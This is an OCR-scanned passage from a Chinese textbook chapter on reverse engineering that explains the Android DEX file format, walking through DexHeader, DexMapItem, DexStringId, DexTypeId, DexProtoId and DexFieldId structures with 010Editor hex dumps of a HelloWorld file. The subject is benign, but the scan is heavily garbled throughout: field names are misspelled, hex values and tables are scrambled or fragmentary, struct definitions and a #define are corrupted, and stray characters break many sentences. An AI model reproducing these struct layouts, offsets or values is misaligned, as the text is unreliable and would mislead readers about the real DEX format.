magic: 表示 Dex 文件 的 标识 与 版 本 号 。 

checksum: 表示 Dex 文件 的 文件 校 验 和 ， 它 使 用 alder32 算法 校 验 文件 。 

signature: 表示 Dex 文件 的 签名 ， 该 签名 使 用 的 是 SHA-1 哈 希 算法 。 

fileSize: 表示 文件 的 大 小 。 

headerSize: 表示 Dex 文件 头 部 的 大 小 。 

endianTag: 表示 文件 的 字 节 序 。 

其 他 部 分 基本 都 是 以 Size 和 Off 命名 的 字段 变量 , 以 Size 命名 的 变量 表示 相关 数据 的 数 
量 ， 以 O 任 命名 的 变量 表示 相关 数据 索引 的 在 文件 中 的 偏 移 地 址 。 比 如 ，stringIdsSize 表示 string 
相关 数据 的 数量 ，stringIdsOff 表示 string 相关 数据 索引 在 文件 中 的 偏 移 地 址 。 注 意 ， 这 里 给 
出 的 并 不 是 string 相关 数据 在 文件 中 的 偏 移 地 址 ， 而 是 string 相关 数据 索引 在 文件 中 的 偏 移 
地 址 。 如 果 对 这 个 索引 的 概念 模糊 了 ， 那 么 再 到 前 面 看 一 下 图 10-6。 

用 任意 十 六 进 制 编辑 器 〈 推 荐 使 用 010Editor) 打开 前 面 我 们 自行 编译 生成 的 Dex 文件 ， 
用 有 具体 数据 来 对 照 DexHeader 结构 体 的 定义 进行 分 析 。 用 010Editor 打开 Dex 文件 后 ， 
DexHeader 对 应 的 数据 部 分 如 图 10-11 所 示 ，010Editor 对 数据 按照 Dex 文件 格式 解析 后 如 
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图 10-12 所 示 。 









0000h: & 
00190h: 
0020h: 
0030h: 
0040h: 
0050h: 
O060h: 


0070h: 76 01 00 00 7E 01 00 090 8C 01 00 00 9D 











满 尖 悄 册 并 并 机 刘 才 已 潞 


DT 00 00 
01 00 00 





O080h:; AB 01i 00 00 c2 01 00 00 pe 01 00 00 EA 
y 
图 10-11 DexHeader 对 应 的 数据 
| Nane Yalue Start 
) struot dex_msEIC magic dex 035 Oh Bh 
uint checksumn EF1DO1AGk ah 人 外 
BSHAL signataurs[20] BF32DABF9TDD9292685429d40EH39FFD571681678 Ch 14h 
uint file_size 744 ZK 外 
int header_sire 112 24h 4h 
uint endian tas 12345678h 28h 4h 
mint link_sire 0 2Ch 时 
mint link_off 0 30h 外 
uint map_off 584 34h 所 
int string ids_size 14 38h 外 
Tint strins ids_off 112 3Ck 4h 
int type lds sire 7 40h 外 
Mint type ids_off 168 44h 4h 
Wint proto_ids_size E) 45h 4h 
uint proto_ids_off 196 4Ch 4h 
uint field ids sixe 1 50h 和 全 
uint Feldids_off 232 54h 
Wint method_ids_size 4 58h 4h 
uint method ids_ofF 240 5Ch 外 
uint class_defs sizs 1 60h 4h 
uint olass_defs_off 272 64h 4h 
让 nt data size 440 68h 全 
nint data off 304 6Ch 外 








掉 ) 和 Comment (注释 、 备 注 )。 














图 10-12 010Editor 对 DexHeader 数据 的 解析 


图 10-12 是 010Editor 对 DexHeader 数据 的 解析 ， 在 解析 中 一 共有 6 列 数据 ， 分 别 是 Name 
(字段 名 称 )、Value 〈 字 段 值 )、Start〈 开 始 位 置 )、Size 长度 )、Color (颜色 ， 该 字段 忽略 





Comm en 和 十 
Be: Magic value 
Be: Adear32 checksum of rest of file 
Be: SHA~] signature of rest of file 
Be File size in bytas 
Be Header size in bytes 
He: Endiiress tug 
Be: Size of linmk sectiom 
了 BE: File offset of Tinjk saction 
Be: File offset of map list 
Be’ Count of strings im the string 一 
Be: Filse offset of string ID list 
Be Count of types in the type ID list 
Be: File offset of type ID list 
Bg’ Count of items in the method pro 
Be File offset of method prototype … 
Be Count of items in the field ID 1 
Be: File offset of field ID list 
Bs Count of items in the method ID *** 
Pe’ File offset of method ID list 
Be Count of items in the class defi… 
Be: File offsat of olass definitions… 
Bs: Sire of data section in bytes 
BE File offsat of data seotion 


按照 DexHeader 结构 体 的 字段 与 数据 进行 整理 ， 整 理 如 表 10-1 所 示 。 
































表 10-1 DexHeader 数据 字段 整理 
字 -入 偏 移 地 址 长 度 值 
magic 0x0 0x8 6465 78 0A 30 33 35 00 
checksum 0x8 0x4 A9 61 AD EF 
a 0x0C Ox14 BF 32 DA 8F 9D DD 92 92 BB 54 29 40 EB 39 FF D5 71 
68 167B 
fileSize 0x20 Ox4 E8 02 00 00 
headerSize 0x24 Ox4 70 00 00 00 
endianTag Ox28 Ox4 78 56 32 12 
linkSize 0x2C Ox4 00 00 00 00 
linkOfF 0x30 0x4 00 .00 00 00 
mapOff 0x34 Ox4 48 02 00 00 
stringIdsSize 0E 00.00 00 
stringldsOfF 0x3C Ox4 70 00 00 00 
typeldsSize 0x40 0x4 加 07 00 00 00 
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续 表 
typeldsOff 0x44 0x4 A8 00 00 00 
protoldsSize Ox4 03 00 00 00 
protoldsOff Ox4C Ox4 C4 00 00 00 





fieldldsSize Ox4 01 00 00 00 
nie | a | 000000 

methodldsSize 0x4 04 00 00 00 

methodIdsOff Ox5C Ox4 F0 00 00 00 

classDefsSize 0 a) 0x4 01 00 00 00 

classDefsOff Te 10 01 00 00 

dataSize 0x4 B8 01 00 00 
dataO 人 ff 0x4 30 01 00 00 

表 10-1 给 出 了 DexHeader 各 个 字段 的 值 ， 下 面 对 一 些 字段 的 值 进行 一 下 解释 。 

magic: 该 字段 的 值 是 一 个 字符 串 ， 为 “dex 035”。 

在 源 代码 中 给 出 了 该 字段 的 定义 ， 不 过 在 源 代码 中 对 该 定义 分 成 了 两 部 分 ， 定 义 如 下 : 

/* DEX file magic number */ 

#define DEX MAGIC "dex\n™" 

起 旧 的 仍然 识别 的 版 本 对 应 于 Android API 级 别 13 或 更 早 的 版 本 ) 

ne DEX_ MAGIC VERS API 13 "035\0" 

headerSize: 是 文件 头 的 大 小 ， 也 就 是 DexHeader 的 大 小 ， 目 前 该 字段 的 值 是 70， 表 示 
它 的 大 小 是 0x70 字 节 。 从 上 面 的 表格 也 可 以 看 出 来 ， 该 结构 体 最 后 一 个 字段 的 位 置 是 6ch， 大 
小 是 4 字 节 ， 那 么 占用 的 大 小 就 是 0x70 字 节 。 

endianTag: 表示 字 节 序 ， 在 这 里 表示 小 尾 字 节 序 。 

以 上 就 是 关于 DexHeader 的 介绍 。 在 这 里 再 说 明 一 点 ， 有 很 多 读者 会 间 ， 将 这 样 的 数据 
整理 成 表格 是 否 有 意义 呢 ? 答案 是 肯定 的 ， 对 于 第 一 次 接触 文件 格式 而 言 ， 将 数据 整理 成 这 
样 的 表格 学 习 是 非常 直观 的 ， 而 且 在 遇 到 了 问题 的 时 候 ， 可 以 通过 查看 表格 的 方式 进行 回顾 
和 分 析 。 对 于 学 习 和 掌握 文件 格式 而 言 ， 能 通过 观察 二 进 制 文件 直接 解析 文件 格式 ， 或 直接 
通过 十 六 进 制 编辑 器 来 自己 完成 具体 的 文件 是 一 种 好 的 学 习 实 践 方法 。 

(2) DexMapItem 结构 体 

在 DexHeader 结构 体 中 的 mapOff 是 DexMapList 的 偏 移 地 址 ，Dalvik 虚拟 机 在 解析 DEX 
文件 后 按照 MapItem 将 其 映射 。 

DexMapList 结构 体 定义 如 下 : 

1 直接 映射 的 "map_listn 

人 DexMapList { 


u4 size; /* 列表 中 的 条 目 */ 
DexMapItem list[1]; /* 条 目 *#/ 














he 
size: 表示 DexMapList 中 共有 多 少 个 DexMapItem 结构 体 。 
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list: 表示 它 是 一 个 DexMaplItem 数组 ， 这 里 定义 了 数组 的 大 小 是 1， 由 于 C 语言 和 C++ 
语言 并 不 对 数组 进行 越界 检查 ， 因 此 将 其 数组 的 大 小 定义 为 1， 然 后 通过 越界 访问 来 达到 访 
问 任意 多 个 数组 元 素 的 目的 。 这 种 设计 思路 在 C 语言 和 C++ 语言 中 经 常见 到 ， 在 前 面 学 习 
Windows 的 PE 文件 结构 ， 导 入 函数 名 称 表 时 就 遇 到 过 。 
DexMapItem 是 具体 每 一 部 分 的 类 型 、 偏 移 的 一 个 描述 ，DexMapItem 结构 体 定义 如 下 : 
[六 
* 直接 定义 的 "map_itemn ， 
Ww 
struct DexMapItem ‘{ 
u2 type’? 
a2 unused; 
u4 sizes? 


ui4 offset; 
}7 


DexMapltem 是 映射 后 每 一 部 分 的 描述 , 或 索引 。 它 与 DexHeader 中 的 xxxSize 和 xxxOff 
类 似 。 在 DexMapItem 保存 的 是 数据 的 类 型 、size 和 Off。 

type: 类 型 编码 ,该 编码 在 安 卓 系 统 的 源 代码 中 定义 了 一 套 枚 举 值 ， 枚 举 值 都 以 kDexType 
开头 ; 

unused: 没有 被 使 用 ， 为 了 结构 体 对 齐 ; 

size: 所 指向 类 型 数据 的 数量 ， 同 DexHeader 中 xxxSize; 

offset: 所 指向 类 型 数据 在 文件 内 的 偏 移 ， 同 DexHeader 中 的 xxxOff。 


对 于 类 型 编码 type 枚 举 值 的 定义 如 下 : 

/* map item type codes */ 

enum { 
kDexTypeHeaderItem = 0x0000， 
kDexTypeStringIdItem = 0x0001， 
kDexTypeTypeldIitem = 0x0002， 
kDexTypeProtoIdItem = 0x0003， 
kDexTypeFieldIdItem = 0x0004， 
kDexTypeMethodIdIitem = 0x0005, 
kDexTypeClassDefItem = 0x0006， 
kDexTypeMapList = 0x1000， 
kDexTypeTypeList = 0x1001, 
kDexTypeAnnotationSetRefList = 0x1002， 
kDexTypeAnnotationSetItem = 0x1003, 
kDexTypeClassDataltem = 0x2000， 
kDexTypeCodeltem = 0x2001; 
kDexTypeStringDataltem = 0x2002, 
kDexTypeDebugIinfoIltem = 0xX2003， 
kDexTypeAnnotationTitem = 0x2004, 
kDexTypeEncodedArrayltem = 0x2005, 
kDexTypeAnnotationsDirectoryltem = 0x2006, 


}; 

按照 DexMapList 和 DexMapItem 来 对 数据 进行 解析 。 

首先 ， 需 要 从 DexHeader 中 查看 DexMapList 所 在 的 偏 移 ， 该 值 在 DexHeader 中 的 MapO 人 f 
字段 中 保存 ， 按 照 表 10-1 可 以 看 到 MapOff 的 值 为 0x248， 根 据 该 值 将 得 到 DexMapList 的 数据 。 

然后 ， 在 文件 偏 移 位 置 0x248 处 ， 查 看 DexMapList 中 的 size 字段 ， 来 确定 有 多 少 个 
DexMapItem 数据 ， 如 图 10-13 所 示 。 

从 图 10-13 中 可 以 看 出 ， 文 件 偏 移 0x248 的 值 为 05D， 也 就 是 DexMapList 的 Size 字段 的 值 
为 13， 表 示 该 值 的 后 面 有 13 个 DexMapItem 结构 体 。 也 就 是 图 10-13 中 ， 文 件 偏 移 0x248 后 面 
的 数据 都 是 DexMaplItem 的 数据 。 在 010Editor 中 对 DexMapItem 数据 的 解析 如 图 10-14 所 示 。 








10.1 


安 卓 可 执行 文件 格式 解析 





0240h: 
0250h: 
0260h: 
0270h: 
0280h: 
0290h: 
02A0h: 
02BOh: 
02C0h: 
02D0h: 
02E0h: 


80 


02 


0D 00 00 00| 00 


00 


v0 








图 10-13 DexMapList 的 size 字段 





二 struct map, list_ type dex_map_list 
uint size 
4 struot map_item list[13] 
struct map_item 1ist[0] 
struct map_item list[1] 
struct map_item list[2] 
struct map_item list[3] 
struct map_item list[4] 
struct map_item Jist[5] 
struct map_item list[6] 
struct map_item 1ist[7] 
struct map_item list[8] 
struct map_itam List[9] 
struct map_item list[10] 
struct map_item list[11] 
struct map_item list[12] 





13 items 


13 


TYPE_HEATER, ITEN 
TYPE_STRING_ID_ITEMN 
TYPE_TYPE_ID_ITEM 
TYPE_PROTO_ID_ITEN 
TYPE_FIELD ID._ITEN 
TYPE NETHOD_ID_ITEM 
TIPE CLASS DEF_ITEN 
TYPE_CODE_ITEN 
TYFE_TYPE LIST 
TYPE_STRING DATA_ITEN 
TYPE_DEBUG THFO_ITEN 
TYPE_CLASS_ LATA_ITEN 
TYPE IAP_LIST 


248h 
248h 
24Ch 
24Ch 


Fg: Be: 
Fe Be; 
Fa; Be: 
Fg; Be: 
Ee: Bs: 
Fg: Be: 
Pe Be 
Fe: Bs 
Fe: Bs 
Fs: Bs 
Fg: Be: 
Fe: Bs: 
Fe: Be: 
Fe Bs 
Fs: Bg: 
Fs Bs; 


图 10-14 010Editor 对 DexMapltem 数据 的 解析 


Map list 





最 后 ， 通 过 图 10-13 来 对 各 个 DexMapItem 的 数据 进行 整理 。 整 理 后 如 表 10-2 所 示 。 

































































表 10-2 DexMapltem 数据 字段 整理 

# 类 型 个 | 缉 偏 ” 移 
0 kDexTypeHeaderltem 01 00 00 00 上 00 00 00 00 
kDexTypeStringIdItem 0E 00 00 00 70 00 00 00 
2 kDexTypeTypeldltem 07 00 00 00 Ag8 00 00 00 
3 kDexTypeProtoldltem 03 00 00 00 C4 00 00 00 
4 kDexTypeFieldIditem ] 01 00 00 00 E8 00 00 00 
5 05 00 kDexTypeMethodIdItem 04 00 00 00 F0 00 00 00 
6 06 00 kDexTypeClassDefltem 01 00 00 00 10 01 00 00 
7 0120 kDexTypeCodeltem 1 02 00 00 00 30 01 00 00 
8 01 10 kDexTypeTypeList 02 00 00 00 68 01 00 00 
9 02 20 kDexTypeStringDataltem 0E 00 00 00 76 01 00 00 
10 03 20 kDexTypeDebugInfoltem 02 00 00 00 2E 02 00 00 
11 00 20 kDexTypeClassDataltem 01 00 00 00 3A 02 00 00 
12 kDexTypeMapList 10 00 00 00 48 02 00 00 





在 DexMapItem 结构 体 中 ， 给 出 了 DexHeader 的 位 置 ， 给 出 了 一 些 数 据 的 索引 的 偏 移 ， 
比如 String、Type、Proto 等 , 这 些 在 DexHeader 的 头 部 和 索引 位 置 也 有 给 出 , 但 是 DexMapItem 


给 出 得 更 为 全 面 一 些 。 





从 DexHeader 结构 体 和 DexMapItem 结构 体 数组 都 可 以 去 解析 DEX 文件 ， 如 果 只 是 要 
解析 相对 重要 的 结构 体 ， 那 么 按照 DexHeader 结构 体 进 行 解析 即 可 ， 如 果 需 要 解析 得 更 为 
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全 面 一 些 ， 那 么 可 以 通过 DexMapItem 结构 体 数组 进行 解析 。 这 个 在 解析 的 时 候 读 者 可 以 
自行 选择 。 

(3) DexStringItem 结构 体 

DexStringItem 结构 体 在 DEX 文件 中 也 是 一 个 数组 , 该 数组 中 保存 了 DEX 文件 中 所 有 需 
要 的 字符 串 。DexStringItem 结构 体 被 DexStringId 进行 索引 ， 而 该 索引 由 DexHeader 中 的 
stringIdsO 任 给 出 ， 也 可 以 通过 遍历 DexMapItem 数组 中 类 型 为 kxDexTypeStringIdItem 的 元 素 
中 的 offset 来 得 到 DexStringId 的 位 置 。 

这 里 通过 DexHeader 的 stringIdsOff 来 得 到 其 位 置 ， 该 stringIdsO 企 的 值 为 0x70。 通 过 
DexHeader 的 stringIdsSize 可 以 知道 DexStringId 的 数量 为 14 个 。DexStringId 的 数据 如 图 10-15 
所 示 。 


0 6 02 O00 .00 0 
My 03 06 00 00 04 00 00 00 





图 10-15 DexStringld 在 010Editor 中 的 数据 


这 里 给 出 DexStringId 结构 体 的 定义 : 
/* 


* Direct-mapped "string id item". 
区 
struct DexStringId { 

u4 stringDataOff; 


7 

从 结构 体 的 注释 中 可 以 看 出 ， 该 结构 体 只 有 一 个 字段 是 stringDataOff， 就 是 指向 了 字符 
串 数据 在 文件 中 的 偏 移 。 

下 面 给 出 DexStringItem 结构 体 的 定义 : 


Struct DexStringIitem { 
uleb128 sizer 
Ubyte data; 

} 7 


uleb128: 表示 字符 串 的 长 度 ， 在 前 面 的 内 容 中 已 经 介绍 过 uleb128 类 型 了 ，; 

data: 表示 字符 串 ， 字 符 串 以 C 语言 或 C++ 的 NULL (\0) 结尾 ， 该 字符 串 并 不 是 传统 
的 ASCII 字符 串 , 它 是 一 种 被 称 作 MUTF-8 编码 的 字符 串 ， 它 类 似 UTF-8 编码 但 是 稍 有 不 同 ， 
这 里 不 做 过 多 的 解释 了 。 


= 人 注 : 该 结构 体 并 不 是 从 DexFile .h 中 给 出 的 ， 而 是 笔者 自己 定义 的 。 
Dex 文件 中 的 字符 串 资 源 是 通过 DexStringId 进行 索引 的 ， 一 个 索引 对 应 一 个 字符 串 ， 即 


对 应 一 个 DexStringItem, 那么 有 多 少 个 DexStringId, 就 有 多 少 个 DexStringItem 。 在 010Editor 
中 查看 DexStringId 和 DexStringItem 相关 的 数据 ， 如 图 10-16、 图 10-17 和 图 10-18 所 示 。 





图 10-16 DexStringld 数组 在 010Editor 中 的 数据 
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0i 00 00 00 06 


iString TD List 


strut string id item string id[1] 


stract strine id item strine id[2] 


, struct string id iten string id[3] 


stroct string id item string id[4] 


1 struct string id iten strine id[5] 


struot string id item strine id[6] 


D struct string id item string id[?] 


struct string id item string_ id[8] 


b struot string id itemn strine id[9] 


struct string id item string id[10] 
struot string id item string id[11] 
struot strine id item string id[12] 


P struot string id item string id[13] 


Cinit> 

Hello World! 
HelloWorld java 
LielloWorld; 
Ljava/io/PrintStream; 
Liava/lang/Object; 
Lijava/lane/String: 
Ljava/lang/System; 

A 


而 
[Ljava/lang/String; 
Main, 

out 

println 


String II 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String ID 
String IT 
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图 10-18 010Editor 对 DexStringItem 数组 的 解析 


将 DexStringItem 进行 整理 ， 整 理 如 表 10-3 所 示 。 
表 10-3 DexStringltem 数据 整理 


0 76 01 00 00 | om6 | 3C 69 6E 69 74 3E 00 <init> 


1 7E 01 0000 48 65 6C 6C 6F 20 57 6F 72 6C 64 21 00 Hello World! 


8C 01 00 00 48 65 6C 6C 6F 57 6f 72 6¢ 64 2e 6a 61 76 61 00 HelloWorld.java 
3 9D 01 0000 4C 48 65 6C 6C 6F 57 6F 72 6C 64 3B 00 LHelloWorld; 





> 








4 AB 01 00 00 Ljava/io/PrintStream; 
5 C201 00 00 Liava/lang/Object; 
4C 6A 6]1 76 61 2F 6C 61 6E 67 2F 53 74 72 69 和 
6 D601 00 00 6E 67 3B 00 Liava/lang/String; 
4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 79 73 74 lb / 
7 EA 01 00 00 65 6D 3B 00 Ljava/lang/System; 
8 FE 01 00 00 56 00 V 
9 01 02 00 00 56 4C 00 VL 
5B 4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 E Si 
10 05 02 00 00 69 6E 67 3B 00 [Liava/lang/String; 
11 1A02 0000 6D 61 69 6E 00 main 
12 20 02 00 00 6F 75 74 00 out 





长 度 
Re 4C 6A 61 76 61 2F 69 6F 27 50 72 69 6E 74 53 
” 7472 65 61 6D 3B 00 
bo 4C 6A 61 76 61 2F 6C 61 6E 67 2F 4F 62 6A 65 
63 74 3B 00 
































13 25 02 00 00 7072696E 74 6C 6E 00 println 


从 表 10-3 中 的 “字符 串 ” 列 可 以 看 到 很 多 熟悉 的 字符 串 。 在 对 Windows 程序 进行 逆向 
的 时 候 , 可 以 通过 字符 串 作为 分 析 的 入 手 特征 , 或 者 通过 Windows API 函数 作为 入 手 的 特征 。 
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在 表 10-3 中 的 字符 串 中 可 以 看 到 DEX 程序 中 的 数据 字符 串 ， 比 如 “HelloWorld”， 也 可 以 看 
到 DEX 程序 中 调用 的 函数 ， 比 如 “printtn”。 因 此 ， 掌 握 了 DexStringItem 数组 以 后 ， 即 使 靠 
猜测 ， 也 对 程序 已 经 有 了 一 个 大 致 的 了 解 了 。 

在 表 10-3 中 的 第 一 列 是 序号 列 或 索引 列 ， 因 为 在 后 面 的 数据 结构 中 对 字符 串 引 用 时 使 用 
的 就 是 该 表 的 序号 。 

(4) DexTypeld 结构 体 

按照 DexHeader 来 看 ， 在 DexStringItem 后 面 是 DexTypeld 的 索引 ， 它 们 由 typeldsSize 
和 typeIdsO 任 给 出 。TypeIds 给 出 了 程序 中 所 使 用 的 所 有 的 数据 类 型 。 该 数据 结构 的 定义 如 下 : 


* Direct-mapped "type id item". 
A 
struct DexTypeld { 
u4 descriptorIldx; 
}3 


通过 DexHeader 的 typeldsSize 得 到 Typelds 的 数量 是 7, 它 在 文件 内 的 偏 移 位 置 是 0xA8。 
DexTypeId 结构 体 中 只 有 一 个 字段 ， 该 字段 的 值 是 在 DexStringItem 中 的 索引 值 ， 先 来 看 一 下 
010Editor 中 的 数据 和 010Editor 对 数据 的 解析 ， 如 图 10-19 和 图 10-20 所 示 。 


25 02 00 06 
GE6160 HO OO 


D 9 SY VV 
5 00 00 00 


Huat type id Uist duox type ids 7 types 

Db struct type_id item type_id[0 HelloWorld 
strucot type_id item type_id[1] java. io. PrintStream 
struct type_id_ item type_id[2] java lang, Object 
struot type_id item type_id[3] java lang. String 
struct type_id item type id[4] Java lans, System 
struct type_id itam type_id[5] void 
struct type_id item type_id[6] java lang String[] 





图 10-20 010Editor 对 DexTypeld 数组 的 解析 


从 图 10-19 中 可 以 看 到 , 第 一 个 DexTypeld 的 数据 是 0x00000003, 这 个 值 是 在 DexStringItem 
数组 中 的 索引 ， 索 引 的 下 标 从 0 开始。 那么 用 0x00000003 这 个 索引 值 在 表 10-3 中 进行 查找 ， 
对 应 的 字符 串 是 “LHelloWorld; ”。 

将 DexTypeld 的 数据 进行 整理 ， 如 表 10-4 所 示 。 


表 10-4 DexTypeld 数据 整理 
2 00 B0 05 00 00 00 Liava/lang/Object; 
Ljava/lang/String; 


5 00BC 08 00 00 00 V 





三 | 
SS 
个 
SS 
[= 
全 
一 
己 
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在 表 10-4 中 的 第 一 列 是 序号 列 或 索引 列 , 因为 在 后 面 的 数据 结构 中 对 类 型 引用 时 使 用 的 
就 是 该 表 的 序号 。 

在 表 10-4 中 出 现 了 3 种 类 型 ， 分 别 是 工 类 型 、V 类 型 和 [类 型 。 在 Dalvik 中 数据 类 型 可 以 
分 为 原始 数据 类 型 和 引用 数据 类 型 。 在 安 卓 系统 的 文档 中 给 出 了 类 型 的 描述 ， 如 表 10-5 所 示 。 








表 10-5 类 型 描述 
语 法 含水 
V void， 只 作为 返回 值 时 有 效 
Z Boolean 
B Byte 
S Short 
© Char 
1 Int 
Es Long 
到 Float 
D Double 
Lfully/qualified/Name: Java 类 的 完全 限定 名 ， 表 示 Java 类 的 类 型 
[descriptor 数组 


(5) DexProtold 结构 体 
接着 DexHeader 结构 体 来 看 ， 在 DexTypeld 下 面 接着 是 DexProtold 结构 体 ， 它 由 protoldsSize 
和 protoldsO 任 给 出 。 它 表示 了 Java 语言 里 的 方法 原型 。 
DexProtold 结构 体 的 定义 如 下 ; 
必 直接 映射 的 "proto_iqd_item" 
ee DexProtoId { 
u4 shortyldx? 


u4 returnTypeIdx; 
u4 parametersOff; 


] 5 

在 DexProtold 结构 体 中 一 共有 3 个 字段 ， 下 面 分 别 介绍 。 

shortyIdx: 指向 DexStringIds 列表 的 索引 。 

returnTypeldx: 指向 DexTypelds 列表 的 索引 ， 它 是 方法 返回 值 的 类 型 。 

parametersOff: 指向 DexTypeList 结构 体 的 偏 移 。 

从 parametersO 作 参数 可 以 看 出 , 对 于 方法 原型 来 说 , 无 法 通过 DexProtolId 一 个 结构 体 完 
整 的 描述 ， 从 而 通过 parametersOff 字段 引入 了 另外 的 一 个 结构 体 ， 即 DexTypeList。 对 于 方 
法 ， 如 果 有 参数 ， 那 么 parametersOff 将 是 参数 的 列表 ， 如 果 没 有 参数 ， 那 么 parametersOff 
的 值 为 0。 下 面 查看 DexTypeList 结构 体 的 定义 : 


/ 
* 站 接 映 射 的 "type_list" 
*/ 


struct DexTypeList { 
ud size; 
DexTypeItem list[1]; 
}; 
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DexTypeList 结构 体 中 有 两 个 字段 ， 下 面 分 别 介绍 。 

size: 表示 参数 的 数量 。 

list 表示 参数 列表 ， 参 数列 表 仍 然 是 一 个 结构 体 DexTypeltem。 
查看 DexTypeltem 结构 体 的 定义 如 下 : 


2 
* 直接 映射 的 "type_item" 
wf 


struct DexTypeltem 1{ 
ua tybeTdx?; 
jh 


DexTypeltem 结构 体 只 有 一 个 参数 ， 该 参数 是 typelds 的 索引 。 

到 此 ， 对 于 DexProtold 相关 的 结构 体 就 介绍 完了 ， 可 以 对 于 方法 原型 而 言 ， 在 Dex 文件 
中 而 言 ， 一 个 方法 的 原型 需要 使 用 3 个 结构 体 才 能 进行 完整 的 描述 。 结 合 实例 ， 来 完整 的 对 
这 部 分 数据 进行 解析 。 先 来 看 一 下 010Editor 工具 解析 后 的 情况 ， 如 图 10-21 所 示 。 


# struct proto id list dex proto_ids 3 prototypes Method prototype ID list 
4 struct proto_id item proto_id[O] 
wint shorty ide 
Mint return_ type idx 2 Type ID of the return type 


Wint parameters off File offset of parameter type list 
4ct proto_id item proto_1d[1 Prototype ID 
) “YL 


wint shorty_idx { 5 String ID of short-form descriptor 


uint return type idx 2 Type ID of the return type 


Wint narameters of 7 168h File offset of parameter type list 
struct fype item list Parameter 号 Liava/lang/String; 3 Prototype parameter dats 
uint sire 1h Wumber of entries in type list 
tr i Type entry 
Typa ntry 
ushort typs i 1 2h Index into type ids list 
» struct proto id item proto_id[2 void (java lang String[]) - Prototype ID 





图 10-21 010Editor 对 DexProtold 数组 的 解析 


解析 DexProtoId 相关 的 数据 ， 仍 然 从 protoldsSize 和 protoIdsO 任 开始 ， 从 DexHeader 结 
构 体 中 可 以 看 到 protoIdsSize 的 值 是 3, 表示 有 3 个 DexProtolds; protoIdsO 任 给 出 了 DexProtoId 
所 在 的 文件 偏 移 ， 其 偏 移 位 置 在 0xC4 的 位 置 处 。 

在 文件 偏 移 0xC4 位 置 处 的 数据 如 图 10-22 所 示 。 


; 0A 00 00 00 锣 





68 91 00 00 00 00 0 
04 00 01 00 Oc 00 00 00 


图 10-22 ”DexProtold 数组 在 010Editor 中 的 数据 


按照 图 10-22 中 选中 的 数据 ， 来 对 该 部 分 内 容 进行 解析 ， 如 表 10-6 所 示 。 
表 10-6 DexProtold 解析 表 


表 10-6 只 是 对 DexProtold 进行 了 解析 , 但 是 还 没有 解析 相应 的 参数 , 也 就 是 根据 parameterOff 


值 来 找到 相关 参数 的 描述 。 对 于 索引 为 0 的 DexProtold 是 没有 参数 的 ， 因 此 只 需要 看 索引 1 
和 索引 2 的 数据 ， 如 图 10-23 所 示 。 











parametersOff 
00 00 00 00 





68 01 00 00 





70 01 00 00 
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0160h: 6E 20 02 00 10 00 0E 00 101 00 00 00 03 00100 00 





0170h: [oi 00 00 00 06 00]o6 3C 9 bE 5 3 TU Oc 48 





图 10-23 ”DexTypeList 在 010Editor 中 的 数据 





根据 图 10-23 对 索引 1 和 索引 2 进行 参数 的 整理 ， 如 表 10-7 所 示 。 
表 10-7 DexProtold 参数 解析 


01 00 00 00 













Lijava/lang/String; 





01 00 00 00 [Djava/lang/String; 


进行 到 这 一 步 的 时 候 ， 已 经 可 以 看 到 很 多 更 为 具体 的 内 容 了 ， 用 索引 1 来 进行 介绍 
原型 声明 VL 表示 ， 方 法 返回 值 类 型 是 V， 方 法 的 参数 的 类 型 是 L (V、L 参考 表 pe 
返回 值 类 型 V 表示 返回 值 的 类 型 是 V (V 参考 表 10-5); 

参数 Ljava/lang/String 表示 参数 的 具体 类 型 。 

由 上 面 的 分 析 可 以 构造 出 索引 1 方法 的 原型 伪 代 码 如 下 。 


void (Ljava/lang/String) { 
return void; 


} 

由 此 可 以 看 出 DexProtold 已 经 基本 可 以 得 到 了 Dex 文件 中 所 有 方法 的 原型 。 

(6) DexFieldId 结构 体 

在 DexFieldIds 中 会 给 出 Dex 文件 中 所 有 的 field。DexFieldId 是 由 DexHeader 结构 体 的 
fieldIdsSize 和 fieldIdsOff 给 出 ， 同 样 它们 给 出 了 DexFieldId 的 数量 和 偏 移 。 

下 本 DexFieldId 结构 体 的 定义 ， 定 义 如 下 : 


党 Direct=mapped "field id ztem" ， 
区 
struct DexFieldId { 
u2. elassLldx? 
u2 typeldx; 
u4 nameldx; 
地 


DexFieldId 结构 体 只 有 3 个 字段 ， 下 面 分 别 进 行 介绍 。 

classIdx: 表示 该 field 所 属 的 class， 该 值 是 en 中 的 一 个 索引 ; 

typeIdx: 表示 该 field 的 类 型 ， 该 值 也 是 DexTypelds 中 的 一 个 索引 ; 

nameldx: 表示 该 field 的 名 称 ， 该 值 是 DexStringIds 中 的 一 个 索引 。 

查看 在 010Editor 中 DexFieldId 的 数据 ， 以 及 对 数据 的 解析 ， 分 别 如 图 10-24、 图 10-25 
所 示 。 


oooos 一 oo 
0 ou uo Oc 00 09 00 


5 exproro-r 
9 天 | 
4 struct field id item field id Javya.io.PrintStream java. lang 
ushort class idx (Dx4) java lang. System Type ID of the class that de 人 ine… 
ushort type_idx (0x1) java io, PrintStream : Type ID for the type of this field 
uint name_id; (DxC) “out” 。 String I for the field’ s name 











图 10-25 ”010Editor 对 DexFieldId 数组 的 解析 


47 
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解析 DexFieldId 同样 从 fieldIdsSize 和 fieldIdsOff 开始 ， 它 们 的 值 分 别 是 1 和 0xE8。 也 
就 是 说 ， 该 Dex 文件 中 只 有 一 个 DexFieldId， 且 它 在 文件 中 的 偏 移 位 置 在 0xE8 处 。 解 析 后 
如 表 10-8 所 示 。 

表 10-8 DexFieldld 解析 


枯 classldx typeldx nameldx 








04 00 0100 0c 00 00 00 








Ljava/lang/System; Ljava/io/PrintStream; out 


(7) DexMethodId 结构 体 
在 DexFieldId 下 面 是 DexMethodId 结构 体 , 该 结构 体 索 引 自 DEX 文件 中 的 所 有 Method， 
该 结构 体 的 定义 如 下 : 
和 Direct-mapped "method id item". 
2 DexMethodId { 
G2 Classloxs 


et hates NE po 
u4 nameldx; 


该 结构 体 的 字段 有 3 个 ， 下 面 分 别 进 行 介绍 。 

classIdx: 表示 该 方法 所 属 的 类 ， 它 是 DexTypelds 的 索引 

protoIdx: 表示 该 方法 的 原型 ， 它 是 DexProtolds 的 索引 ， 

nameldx: 表示 该 方法 的 名 称 ， 它 是 DexStringIds 的 索引 。 

查看 在 010Editor 中 DexMethodId 的 数据 ， 以 及 对 数据 的 解析 , 分 别 如 图 10-26、 图 10-27 
所 示 。 














